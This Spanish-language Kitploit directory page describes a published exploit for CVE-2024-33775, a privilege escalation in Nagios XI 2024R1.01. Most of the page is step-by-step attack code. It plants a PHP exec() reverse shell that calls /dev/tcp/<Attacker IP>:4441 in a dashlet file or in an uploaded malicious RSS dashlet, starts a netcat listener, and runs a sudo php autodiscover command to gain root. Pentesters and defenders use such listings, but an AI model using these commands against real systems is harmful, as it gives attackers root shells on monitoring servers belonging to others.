Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/neo-xed/cve-2024-33775
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Escalada de privilegios para Nagios XI 2024R1.01, que permite acceso root completo desde usuarios NAGIOS o APACHE mediante inyección maliciosa de dashlets RSS y ejecución de comandos sudo.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE descubierto por: K. Wahab (Neo`X)

Detalles de la vulnerabilidad:

  • Producto: Nagios XI Versión 2024R1.01
  • Vulnerabilidad: Escalada de privilegios desde los usuarios "NAGIOS" o "APACHE"
  • Resultado: Acceso root completo en el sistema objetivo
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

Exploit:

En este ejemplo se utiliza el RSS Dashlet.

1. Crear una nueva instancia de Nagios XI:

  • Puedes descargar el archivo OVA de Nagios XI Versión 2024R1.01 desde: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. Escalada de privilegios:

Exploit como NAGIOS:

  • Añade dentro del archivo .inc.php del dashlet en "/usr/local/nagiosxi/html/includes/dashlets/" el siguiente contenido:
root@kitploit:~
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • Inicia un servidor de escucha de Netcat en la máquina atacante:
root@kitploit:~
nc -nlvp 4441
  • Ejecuta el siguiente comando para escalar privilegios y recibir una conexión como root:
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

Exploit como APACHE:

  • Ve a la página de administración de "dashlets" y descarga un Dashlet:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • Modifica el archivo *.inc.php:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

Dashlet_inc_php

  • Inicia un servidor de escucha de Netcat en la máquina atacante:
root@kitploit:~
nc -nlvp 4441
  • Sube el dashlet malicioso en la página de administración de dashlets y espera la conexión como usuario APACHE.
  • Ejecuta el siguiente comando para escalar privilegios y recibir una conexión como root:
root@kitploit:~
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1

(Nota: Después de ejecutar el comando recibirás la conexión como APACHE, usa CTRL+C para salir y reinicia el listener nuevamente varias veces)

Apache_root

Descargar herramienta